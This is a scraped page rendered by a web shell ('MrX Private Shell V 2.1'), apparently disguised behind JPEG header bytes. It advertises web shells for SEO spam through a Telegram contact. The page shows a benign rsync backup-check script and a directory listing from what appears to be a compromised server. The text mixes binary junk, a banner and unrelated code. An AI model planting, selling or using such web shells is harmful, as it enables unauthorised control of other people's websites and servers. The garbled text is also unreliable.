����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# check the backup archive on remote rsync server case $(rsync_proto "$BACKUP_URL") in (ssh) ssh $(rsync_remote_ssh "$BACKUP_URL") "ls -ld $(rsync_path_full "$BACKUP_URL")/backup" >/dev/null 2>&1 \ || Error "Archive not found on [$(rsync_remote_full "$BACKUP_URL")]" ;; (rsync) $BACKUP_PROG "$(rsync_remote_full "$BACKUP_URL")/backup" >/dev/null 2>&1 \ || Error "Archive not found on [$(rsync_remote_full "$BACKUP_URL")]" ;; esac
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 050_prep_rsync.sh | File | 1.34 KB | 0644 |
|
| 100_check_rsync.sh | File | 1.32 KB | 0644 |
|
| 150_check_rsync_protocol_version.sh | File | 2.69 KB | 0644 |
|
| 550_check_remote_backup_archive.sh | File | 455 B | 0644 |
|